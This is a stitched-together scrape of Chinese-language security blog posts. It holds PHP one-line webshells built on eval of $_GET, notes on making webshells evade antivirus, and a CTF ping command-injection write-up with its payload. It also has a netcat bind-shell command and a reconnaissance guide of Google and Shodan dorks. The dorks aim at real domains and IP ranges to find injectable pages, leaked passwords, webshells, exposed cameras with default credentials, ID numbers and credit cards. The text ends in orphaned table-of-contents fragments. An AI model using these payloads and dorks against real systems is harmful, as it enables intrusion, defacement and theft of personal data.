define('G',$arr1[2][1]);
eval(G);

define('G',$_GET[1]);
eval('1;'.G);

4.待更....

Webshell防杀学习

把用纯php代码实现的Webshell后门(以下统称为"木马")，主要分为以下几类：

单/少功能木马
能完成写入文件、列目录、查看文件、执行一些系统命令等少量功能的Webshell。
逻辑木马
利用系统逻辑漏洞或构造特殊触发条件，绕过访问控制或执行特殊功能的Webshell。
一句话木马
可以在目标服务器上执行php代码，并和一些客户端(如菜刀、Cknife)进行交互的Webshell。
多功能木马
根据PHP语法，编写较多代码，并在服务器上执行，完成大量间谍功能的Webshell(大马)。

一句话原理

客户端将PHP代码使用特殊参数名(密码)，发送给放置在服务端上的一句话木马文件；
一句话木马脚本在服务器上执行发来的PHP代码，然后将执行结果回传给客户端，客户端将结果解析并展示给操作者。

查杀现状

根据一句话木马原理，我们知道必须要在服务器上执行客户端发来的字符串形式的PHP代码。

脚本要将字符串(或文件流)当作PHP代码执行，目前主要会使用以下函数：

函数	说明
eval	PHP 4, PHP 5, PHP 7+ 均可用，接受一个参数，将字符串作为PHP代码执行
assert	PHP 4, PHP 5, PHP 7.2 以下均可用，一般接受一个参数，php 5.4.8版本后可以接受两个参数
正则匹配类	preg_replace/ mb_ereg_replace/preg_filter等
文件包含类	include/include_once/require/require_once/file_get_contents等

文章参考

LandGrey php一句话木马绕过研究
https://www.t00ls.net/viewthread.php?tid=45816&highlight=%E4%B8%80%E5%8F%A5%E8%AF%9D

阿乾 18.5.11分享个过D盾某狗的一句话小马
https://www.t00ls.net/viewthread.php?tid=45815&highlight=%E4%B8%80%E5%8F%A5%E8%AF%9D

love71 简短的免杀一句话
https://www.t00ls.net/viewthread.php?tid=45404&highlight=%E4%B8%80%E5%8F%A5%E8%AF%9D

Write up

由ISCC2018…

2018年5月8日2018年6月4日
by harmoc

题面

请ping我的IP 看你会ping通吗

题解

进入题目只有题面这么一句话。

既然题面说了ping，自然很容易联想到命令注入这一块儿，之前没有好好用过命令注入，最近做了这题，顺便总结一下命令注入的相关知识。

好了，回归本题。经测试，?ip=xxx的确可以做到ping，根据提示，注入点也八九不离十就在这儿了。

测试了n多截断，都没有成功，包括& | ; (反引号) || && ,最后查到还有%0a，代表空格。。学习了。注入成功。

然后就是读取了，先ls一下，看到当前目录下只有index.php,cat看了一下，发现过滤情况。不过flag并不在这儿

        ';' => '',
        '|' => '',
        '-'  => '',
        '$'  => '',
        '('  => '',
        ')'  => '',
        '`'  => '',
        '||' => '',
    );

    $target = str_replace( array_keys( $substitutions ), $substitutions, $target );

    if( stristr( php_uname( 's' ), 'Windows NT' ) ) {
        // Windows
        $cmd = shell_exec( 'ping  ' . $target );
    }
    else {
        // *nix
        $cmd = shell_exec( 'ping  -c 1 ' . $target );
    }
    echo  "
{$cmd}
";
?>

而后直接ls / 到根目录，查看各个可疑的文件夹，在/home里发现flag，cat读取之。最终Payload为：index.php?ip=127.0.0.1%0Acat /home/flag

分析

这道题不得不说，还是吃了点苦头的。自己对命令注入了解甚少，当初培训讲过的也已经忘记了。所幸，CTF是学习的过程，学到东西就是好题。一开始找不到可用的截断的时候，用了神器commix，然而并没有跑出来。。这个应该还得继续研究一下。

OS Command Injection总结

0x00. Def.

系统提供命令执行类函数主要方便处理相关应用场景的功能.而当不合理的使用这类函数，同时调用的变量未考虑安全因素，就会执行恶意的命令调用，被攻击利用。

0x01.Causes

此类命令执行函数依赖PHP配置文件的设置，如果配置选项 safe_mode 设置为 off，此类命令不可执行，必须设置为 On
的情况下，才可执行。PHP 默认是关闭的。在安全模式下，只有在特定目录中的外部程序才可以被执行，对其它程序的调用将被拒绝。这个目录可以在php.ini文件中用 safe_mode_exec_dir指令，或在编译PHP是加上 –with-exec-dir选项来指定，默认是/usr/local/php /bin。

0x02.Method

常见php命令注入函数：

eval(),，assert(), system()，preg_replace(), create_function, call_user_func, call_user_func_array，array_map()，反引号，ob_start()，exec()，shell_exec()，passthru()，escapeshellcmd()，popen()，proc_open()，pcntl_exec()

命令注入中有讲究的字符

'$'
';'
'|'
'-'
'('
')'
'反引号'
'||'
————以上是上题过滤的。
以下是查到的其他的：
'&&'
'&'
'}'
'{'

姿势

检测一阶命令注入的最佳方式是尝试执行一个sleep命令
在外部可以访问的端口上生成一个shell（仅适用于自定义netcat构建）：nc -l -n -vv -p 80 -e /bin/bash (unix) 或 nc -l -n -vv -p 80 -e cmd.exe (windows)。
如果想要知道目标主机名的长度，我们可以将主机名的输出通过管道符传递给wc -c命令。

绕过

防护措施中使用最多的就是对于payload中空格的限制。

OS命令注入中的空格:
- bash
  空格可以替换为%20、%09(tab)、%2b(+) in url、{IFS}
- Win shell
  空格可以替换为%20、%09(tab)、%0b、%0c、%2b(+) in url
花括号扩展：
- 如：;{cat,/etc/passwd}'

参考文章

FREEBUF 命令注入与挖洞 http://www.freebuf.com/vuls/139924.html
FREEBUF i春秋关于命令注入的分享http://www.freebuf.com/column/146503.html

千剑

Google ha…

2018年4月15日2018年6月4日
by harmoc

Google Hacking

intitle: 从网页标题中搜索指定的关键字,可专门用来搜索指定版本名称的各类web程序,也可用allintitle

inurl: 从url中搜索指定的关键字,可专门用来构造各种形式的漏洞url,也可用allinurl

intext: 从网页中搜索指定的关键字,可专门用它来穿透到漏洞页面等……也可用allintext

filetype: 搜索指定的文件后缀,例如:sql mdb txt bak backup ini zip rar doc xls……

site: 在某个特定的网站内中搜索指定的内容

link: 搜索和该链接有关联连接,比如:友情链接

index of: 找目录遍历会用到

google所支持的一些通配符(建议选择性的用,越精确,就意味着结果越少,这样我们容易漏掉一些目标,毕竟不是正则,我们的最终目的是找到漏洞):

    +   强制包含某个字符进行查询
    -   查询的时候忽略某个字符
    ""  查询的时候精确匹配双引号内的字符
    .   匹配某单个字符进行查询
    *   匹配任意字符进行查询
    |   或者,多个选择,只要有一个关键字匹配上即可

针对目标站点利用样例：

目录遍历漏洞  语法为: site:jiebao8.top intitle:index.of
配置文件泄露  语法为: site:jiebao8.top ext:xml | ext:conf | ext:cnf | ext:reg | ext:inf | ext:rdp | ext:cfg | ext:txt | ext:ora | ext:ini
数据库文件泄露  site:jiebao8.top ext:sql | ext:dbf | ext:mdb
日志文件泄露 site:jiebao8.top ext:log
备份和历史文件 site:jiebao8.top ext:bkf | ext:bkp | ext:bak | ext:old | ext:backup
SQL错误  site:jiebao8.top intext:"sql syntax near" | intext:"syntax error has occurred" | intext:"incorrect syntax near" | intext:"unexpected end of SQL command" | intext:"Warning: mysql_connect()" | intext:"Warning: mysql_query()" | intext:"Warning: pg_connect()
7 公开文件信息
site:jiebao8.top ext:doc | ext:docx | ext:odt | ext:pdf | ext:rtf | ext:sxw | ext:psw | ext:ppt | ext:pptx | ext:pps | ext:csv
8  phpinfo()  site:jiebao8.top ext:php intitle:phpinfo "published by the PHP Group"

找到可能存在的包含和命令执行类漏洞:

    inurl:footer.inc.php?settings=
    inurl:/pb_inc/admincenter/index.php?page=
    inurl:/pnadmin/categories.inc.php?subpage=
    inurl:/index.php??view=src/sistema/vistas/
    inurl:/edit.php?em=file&filename=
    inurl:/path_to_athena/athena.php?athena_dir= 远程包含
    inurl:/path_to_qnews/q-news.php?id=  远程包含
    inurl:/inc/backend_settings.php?cmd=
    inurl:login.action strus2系列执行漏洞利用
    inurl:php?x=                    inurl:php?open=
inurl:php?visualizar=         inurl:php?pagina=
inurl:php?inc=                 inurl:php?include_file=
inurl:php?page=                inurl:php?pg=
inurl:php?show=                inurl:php?cat=
inurl:php?file=                inurl:php?path_local=
inurl:php?filnavn=            inurl:php?HCL_path=
inurl:php?doc=                 inurl:php?appdir=
inurl:php?phpbb_root_dir=    inurl:php?phpc_root_path=
inurl:php?path_pre=           inurl:php?nic=
inurl:php?sec=                 inurl:php?content=
inurl:php?link=                inurl:php?filename=
inurl:php?dir=                 inurl:php?document=
inurl:index.php?view=         inurl:*.php?locate=
inurl:*.php?place=             inurl:*.php?layout=
inurl:*.php?go=                inurl:*.php?catch=
inurl:*.php?mode=            inurl:*.php?name=
inurl:*.php?loc=             inurl:*.php?f=
inurl:*.php?inf=             inurl:*.php?pg=
inurl:*.php?load=            inurl:*.php?naam=
allinurl:php?page=           allinurl:php?file= 
inurl:php?x=                  inurl:admin.php?cal_dir=
inurl:php?include=           inurl:php?nav=
inurl:*.php?sel=             inurl:php?p=
inurl:php?conf=              inurl:php?prefix=
inurl:theme.php?THEME_DIR= 
inurl:php?lvc_include_dir=  
inurl:php?basepath=          inurl:php?pm_path=
inurl:php?user_inc=          inurl:php?cutepath=
inurl:php?fil_config=        inurl:php?libpach=
inurl:php?pivot_path=        inurl:php?rep=
inurl:php?conteudo=          inurl:php?root=
inurl:php?configFile         inurl:php?pageurl
inurl:php?inter_url          inurl:php?url=
inurl:php?cmd=                inurl:path.php?my=
inurl:php?xlink=              inurl:php?to=
inurl:file.php?disp=

找各类数据库注入:

    inurl:categorysearch.php?indus=
    intext:"樂天台東民宿網" inurl:news_board.php 
    小商城类注入:
            inurl:".php?catid=" intext:"View cart"
            inurl:".php?catid=" intext:"Buy Now"
            inurl:".php?catid=" intext:"add to cart"
            inurl:".php?catid=" intext:"shopping"
            inurl:".php?catid=" intext:"boutique"
            inurl:".php?catid=" intext:"/store/"
            inurl:".php?catid=" intext:"/shop/"
            inurl:".php?catid=" intext:"Toys"
            inurl:details.php?BookID=
            inurl:shop.php?do=part&id=

普通cms类注入:

 inurl:article.php?ID=        inurl:newsDetail.php?id=
 inurl:show.php?id=            inurl:newsone.php?id=
 inurl:news.php?id=            inurl:event.php?id=
 inurl:preview.php?id=        inurl:pages.php?id=
 inurl:main.php?id=            inurl:prod_detail.php?id=
 inurl:view.php?id=            inurl:product.php?id=
 inurl:contact.php?Id=        inurl:display_item.php?id=
 inurl:item.php?id=            inurl:view_items.php?id=
 inurl:details.asp?id=        inurl:profile.asp?id=
 inurl:content.asp?id=        inurl:display_item.asp?id=
 inurl:view_detail.asp?ID=    inurl:section.php?id=
 inurl:theme.php?id=          inurl:produit.php?id=
 inurl:chappies.php?id=       inurl:readnews.php?id=
 inurl:rub.php?idr=           inurl:pop.php?id=
 inurl:person.php?id=         inurl:read.php?id=
 inurl:reagir.php?num=        inurl:staff_id=
 inurl:gallery.php?id=        inurl:humor.php?id=
 inurl:spr.php?id=            inurl:gery.php?id=
 inurl:profile_view.php?id=
 inurl:fellows.php?id=        inurl:ray.php?id=
 inurl:productinfo.php?id=
 inurl:file.php?cont=         inurl:include.php?chapter=
 inurl:principal.php?param=
 inurl:general.php?menue=     inurl:php?pref=
 inurl:nota.php?chapter=      inurl:php?str=
 inurl:php?corpo=               inurl:press.php?*

除了上面这些常规找注入的方式,不妨直接在网页标题或者url中搜sql语句,说不定也会有收获:

intitle:注入常用的一些sql语句,比如:常用的union,substr(),select等等……

批量搜集万能密码(属于注入的一种):

    inurl:"wladmin/login.asp"  
    Username : '=' 'or'
    Password : '=' 'or'

    intext:POWERED BY Versatile Software Services       默认后台/alogin.aspx
    User ==> 'or''='
    Pass ==> 'or''='

    inurl:/media.php?hal=login
    Email: '=''or'@gmail.com
    Pass: '=''or'

    intext:"Powered by : Best Webmasterz." 默认后台/admin
    User : '=' 'OR'
    Pass : '=' 'OR'

    intext:"Web Design and Maintenance by Cloud 5 Solutions" 默认后台/admin/login.php
    User : '=' 'OR'
    Pass : '=' 'OR'

    intext:"网站设计：火龙科技" 默认后台/maintain/login.php
    Username : '=' 'or'
    Password : '=' 'or'

    intext:"Powered by Moodyworld" 默认后台/admin/
    Username : '=' 'or'
    Password : '=' 'or'

找遗留的各种数据库报错,物理路径,数据库版本,服务器探针类文件等等……:

    site:*.tw  inurl:/phpinfo.php
    filetype:log "PHP Parse error"| "PHP Warning"
    site:*.tw  "id=" & intext:"Warning: mysql_fetch_array()
    site:*.jp  "id=" & intext:"Warning: getimagesize()
    site:*.br  "id=" & intext:"Warning: array_merge()
    site:*.tw  "id=" & intext:"Warning: mysql_fetch_assoc()
    site:*.tw  "id=" & intext:"Warning: mysql_result()
    site:*.jp  "id=" & intext:"Warning: pg_exec()
    site:*.tw  "id=" & intext:"Warning: require()
    inurl:/robots.txt site:*.*

搜集各种账号密码,比如,数据库密码,ftp,vpn,htpasswd,telnet等等……:

    可能会遗留的密码文件:
            inurl:passlist.txt
            inurl:password.txt

    重要配置文件泄露:
            inurl:/application/configs/  配置文件名为/application/configs/application.ini

    htpasswd:
            htpasswd.bak filetype:htpasswd

    vpn(cisco)[为捅内网,做准备]:
            filetype:pcf  "GroupPwd"

    cisco在线密码解密网站:
            https://www.unix-ag.uni-kl.de/~massar/bin/cisco-decode



    ftp:
            "index of/" "ws_ftp.ini" "parent directory"
            "your password is" filetype:log
            filetype:ini inurl:"serv-u.ini"
            filetype:ini inurl:flashFXP.ini
            filetype:ini ServUDaemon
            filetype:ini wcx_ftp
            filetype:ini ws_ftp pwd
            ext:inc "pwd=" "UID="
            auth_user_file.txt
            例如:
                    http://www.cryptoman.com/ftp/
                    http://www.cryptoman.com/ftp/WS_FTP.ini
    其他密码:
            admin account info" filetype:log

批量找目录遍历[上传点,数据库文件下载,phpmyadmin,网站后台及网站各种备份,源代码泄露等同样也可以用这种方式慢慢找]:

    site:*.hk index of /admin
    site:*.hk index of /upfiles
    site:*.hk index of /fckeditor/editor/
    site:*.tw index of /admin/uploadfile
    site:*.tw index of /admin/file
    site:*.tw index of /system/file
    site:*.tw index of /phpmyadmin
    site:*.tw index of /web/backup/
    inurl:/phpmyadmin/index.php site:*.tw

搜同行们的各种工具脚本:

绝大部分人在用别人东西的时候,基本是很少看里面代码的[即使开源],更不要说去除特征及后门,没办法现状如此,大家都很懒,既是如此,就不免要把自己的成果也被迫的共享给别人一份,所以养成良好的读代码习惯,是有必要的。

搜同行的脱裤脚本:

    intitle:登录 - Adminer  这里只是随便举个例子,你可以自己平时多搜集一些境内外常用的脱裤脚本的标题,文件名什么的,慢慢尝试

同样,你也可以用上面这种方式来找下别人的aspx嗅探脚本,例如:

    websniff

找别人遗留的各种webshell,平时注意多搜集一些镜内外常用的大马特征,这里只是随便举几个例子,你可以随意组装自己的:

inurl:b374k.php filetype:php
inurl:c99.php
inurl:c100.php Generation time:
inurl:itsecteam_shell.php
intext:x2300 Locus7Shell v. 1.0a beta Modded by
intext:c99shell inurl:c99.php
powered by Captain Crunch Security Team
"inurl:c99.php" + "intext:safe"
intitle:r57shell
intitle:c99shell +uname
inurl:c99.php uid=0(root)
intitle:c99shell+filetype:php
intitle:ly0kha shell
inurl:.php "cURL: ON MySQL: ON MSSQL: OFF"
"Shell" filetypehp intext:"uname -a:" "EDT 2010"
intitle:"intitle:r57shell"
inurl:"c99.php" & intext:Encoder Tools Proc. 
inurl:"c100.php" & intext:Encoder Tools Proc. 
intitle:"Shell" inurl:".php" & intext:Encoder Tools Proc.

找到目标的owa和vpn入口[内网入口]:

 owa入口:
 inurl:/owa/auth/logon intitle:outlook
 inurl:/owa/auth/logon intext:outlook
vpn入口:
 inurl:/sslvpn site:hk

找些好下手的目标子域:

site:polyu.edu.hk inurl:asp?pid=
site:polyu.edu.hk inurl:aspx?id=
site:polyu.edu.hk inurl:php?id=
site:polyu.edu.hk inurl:jsp?id=
site:polyu.edu.hk inurl:do?id=
site:polyu.edu.hk inurl:cgi?id=

找目标的数据库备份及其他敏感文件目录：

[一般后缀都是sql,mdb,txt……],像数据库和网站备份这种东西,还是建议直接用工具跑比较好,前提字典要自己精心制作:

    filetype:sql inurl:backup inurl:wp-content
    inurl:/eWebEditor/db/ site:*.com

从目标网站上搜集目标邮箱:

    site:*.gov.tw *@gov.tw

不错的google hacking站点:

    https://cxsecurity.com/exploit/  极力推荐此站点,里面已经为我们准备好各种各样的高质量google dorks
    https://www.exploit-db.com/google-hacking-database/ 并不推荐,exp不错,但这方面比较废

其他的一些小恶作剧:

    搜集个人身份证信息
            filetype:xls 身份证 site:cn
    搜集被盗QQ号什么的
    搜集别人还在有效期的信用卡,千万不要干坏事儿,不然会被请去喝茶的……
    还有图片识别,位置识别,谷歌为我提供了很多很强大的功能,有必要的话可以去学习如何使用谷歌的这些api

关于robots.txt文件的作用:

    此文件一般位于网站根目录下,规定了搜索引擎不能爬行的一些目录,一般都是一些敏感目录,比如:后台,数据库连接配置文件,安装目录等等……
    一般我们在试了几个常用的后台目录都不行的情况,习惯性的就会直接去访问下目标的robots.txt文件,很可能这文件里面就存的有后台路径
    但,那只是有可能,不尝试,连可能都没有

shodan和zoomeye

Shodan

shodan 入门[在入侵一些网络设备的时候还是非常好用的,俗称"工控设备渗透"]:
[不像谷歌,bing那样只是单单是基于web爬行,shodan则是基于网络旗标搜索的,我们主要可以用它来碰各种网络设备的默认密码默认只能看到50个结果,可能需要付点费才能看到更多的搜索结果]

官方站点[去注册个账号,必须的]:
https://www.shodan.io/

shodan 内置的几个简单过滤器:
city: 城市,貌似只支持英文
country: 国别,比如:cn,us,jp,tw,br,ph,vn,hk
hostname: 主机名[域名如果是子域还需要在前面加个.]
net: 网络地址范围,可以是单个ip或者cidr格式
os : 操作系统 centOS,win32,red hat,suse 等等
port: 根据端口,HTTP (80),FTP (21),SSH (22),SNMP (161),SIP (5060)等等
product: 具体的产品名称

下面是一些简单的搜索实例:

搜集某个城市的特定设备标识[自己多收集一些常见的软件和设备标识]:

            Microsoft-IIS/5.0 city:"TOKYO"   可以逐个尝试写权限
            Microsoft-IIS/6.0 city:"Seoul"        
            Microsoft-IIS/7.5 city:"Hong Kong"
            apache city:"Nagoya"
            Apache/2.2.27 city:"Nagoya"
            Tomcat city:"Seoul"
            cisco city:"Osaka"
            tplink city:"nanjing"

搜索特定版本操作系统及特定端口:

            os:"linux" net:"72.34.62.0/24"
            os:"windows" net:"195.40.91.0/24"
            Apache city:"Hong Kong" port:"8080"  product:"Apache Tomcat/Coyote JSP engine"
            Apache city:"Seoul" port:"8080"
            hostname:".polyu.edu.hk" os:"windows"

搜索指定国家地域的特定类型软件(还是那句话,多搜集一些软件标识):

            product:"tomcat"  net:"158.132.18.0/24"
            product:"apache"  net:"158.132.18.0/24"
            product:"iis"     net:"158.132.18.0/24"
            port:"8080" jboss country:CN

扫描指定网段的所有数据库服务器:

            product:"Mysql"  net:"140.117.13.0/24" port:"3306"
            port:"1433" net:"78.131.197.0/24"
            port:"5432" net:"77.55.149.0/24"
            port:"1521" net:"78.143.192.0/12"
            port:"1521" city:"Osaka"

搜索远程管理终端:

            os:"windows" port:"3389" net:"107.160.1.0/24"
            os:"linux" port:"22" net:"107.160.1.0/24"
            os:"linux" port:"23" net:"107.160.1.0/24"
            os:"linux" port:"23" net:"87.124.0.0/15"

搜路由:

搜索ftp:

            port:"21" net:"107.160.1.0/24"
            port:"69" net:"218.242.16.0/24"

在某个城市中搜索指定的端口,操作系统及设备:

            city:"Hong Kong" port:"69"
            city:"Hong Kong" port:"3389"
            city:"Hong Kong" port:"22"
            city:"Hong Kong" port:"23"
            city:"Hong Kong" port:"3306"
            city:"Hong Kong" port:"110"
            city:"Hong Kong" os:"windows"
            city:"Hong Kong" product:"cisco"
            city:"Hong Kong" port:"8080"

按照国家进行搜索指定的设备,端口,服务器:

            port:"23" country:CN
            port:"1433" country:CN
            port:"3389" country:CN
            tplink country:CN
            huawei country:CN
            netcam  country:CN
            country:CN net:"115.225.113.0/24" port:"22"
            country:CN router
            admin login  country:HK
            hacked by country:HK

搜集缺省密码:

            "default password" city:"Hong Kong"
            country:CN "default password"

搜exp[其实,就是把exploit上的东西扒下来]:

            https://exploits.shodan.io/welcome

    搜索各类漏洞摄像头:
            netcam net:"187.189.82.0/24"

    批量搜集一些开源程序,尝试0day批量利用:

    下面是一些常见的默认用户名密码,可以撞撞运气:
            ACTi: admin/123456 or Admin/123456
            Axis (traditional): root/pass,
            Axis (new): requires password creation during first login
            Cisco: No default password, requires creation during first login
            Grandstream: admin/admin
            IQinVision: root/system
            Mobotix: admin/meinsm
            Panasonic: admin/12345
            Samsung Electronics: root/root or admin/4321
            Samsung Techwin (old): admin/1111111
            Samsung Techwin (new): admin/4321
            Sony: admin/admin
            TRENDnet: admin/admin
            Toshiba: root/ikwd
            Vivotek: root/<blank>
            WebcamXP: admin/ <blank>

    针对某个端口,批量搜集感染了某种数据标志的木马:

    批量搜集一些经典漏洞,比如:心脏滴血,bash远程执行,等等……:

Zoomeye

ZoomEye快捷键:

显示帮助 shift+/
隐藏该帮助 ESC 
回到首页 shift 
高级搜索 Shift +s 
聚焦搜索框 s

指定搜索的组件以及版本

app：组件名称

ver：组件版本

例如：搜索 apache组件版本2.4

app:apache ver:2.4

指定搜索的端口

port:端口号

例如：搜索开放了SSH端口的主机

port:22
一些服务器可能监听了非标准的端口。要按照更精确的协议进行检索，可以使用service进行过滤。

指定搜索的操作系统

OS:操作系统名称

例如：搜索Linux操作系统

OS：Linux

指定搜索的服务

service：服务名称

例如，搜素SSH服务

Service：SSH

指定搜索的地理位置范

country：国家名

city：城市名

例如：

country:China

city：Beijing

搜索指定的CIDR网段

CIDR:网段区域

例如：

CIDR：192.168.158.12/24

搜索指定的网站域名

Site:网站域名

例如：

site:www.baidu.com

搜索指定的主机名

Hostname:主机名

例如：

hostname:zwl.cuit.edu.cn

搜索指定的设备名

Device：设备名

例如：

device:router

搜索具有特定首页关键词的主机:

Keyword：关键词

例如：

keyword:technology

文章参考

T00ls 熟练利用google,shodan及bing hacking辅助快速渗透[主要针对大型目标]
https://www.t00ls.net/viewthread.php?tid=38850&highlight=google%2Bhack

信息收集利器：ZoomEye
http://www.freebuf.com/sectool/163782.html

标签： <span>渗透</span>

1. 信息收集

1.1. 域名与IP

1.2. 端口与服务

1.3. OSINT

1.4. C段

2. 打点

2.1. 前期收集服务1/0Day

2.2. 前期OSINT成果可利用的点

2.3. 钓鱼（结合社工）

2.4. 迂回上下游

2.5. 近源渗透/供应链攻击/...——突出一个非常规

3. 当前目标整理

3.1. 凭证信息

3.2. 本地通往他处途径

4. 横纵向扩散

4.1. 机制性的扩散方式

4.2. 常规对主机渗透思路扩散

X. Repeat

Misc

在线搜索

在线查找

通过AS号( Autonomous System Numbers)进行查找：

证书透明度：

参考：

进谷歌 找注入

没注入 就旁注

没旁注 用0day

没0day 猜目录

没目录 就嗅探

拿不下 去自杀

爆账户 找后台

传小马 放大马

拿权限 挂页面

放暗链 清数据

前言

上传漏洞类型总结

0x01.限制上传的逻辑在前端

0x02.仅限制Content-Type

0x03.可重写文件解析规则绕过

0x04.后缀名黑名单、过滤

黑名单

可被利用过滤

0x05.可被利用Windows系统的特性

利用Windows系统的文件名特性

Windows文件流特性绕过

0x06.可被截断绕过

上传路径名%00截断绕过

0x07.文件头检查

0x08.渲染函数导致可用图片webshell

0x09.条件竞争

Write up

Pass-01

Pass-02

Pass-03

Pass-04

Pass-05

Pass-06

Pass-07

Pass-08

Pass-09

Pass-10

Pass-11

Pass-12

Pass-13

Pass-14

Pass-15

Pass-16

Pass-17

Pass-18

Pass-19

后记

参考

前言

来源

1.利用md5绕过waf的一句话

本体：

本质

利用方式

2.get_defined_vars函数马

进谷歌找注入

没注入就旁注

没旁注用0day

没目录就嗅探

拿不下去自杀

爆账户找后台

传小马放大马

拿权限挂页面

放暗链清数据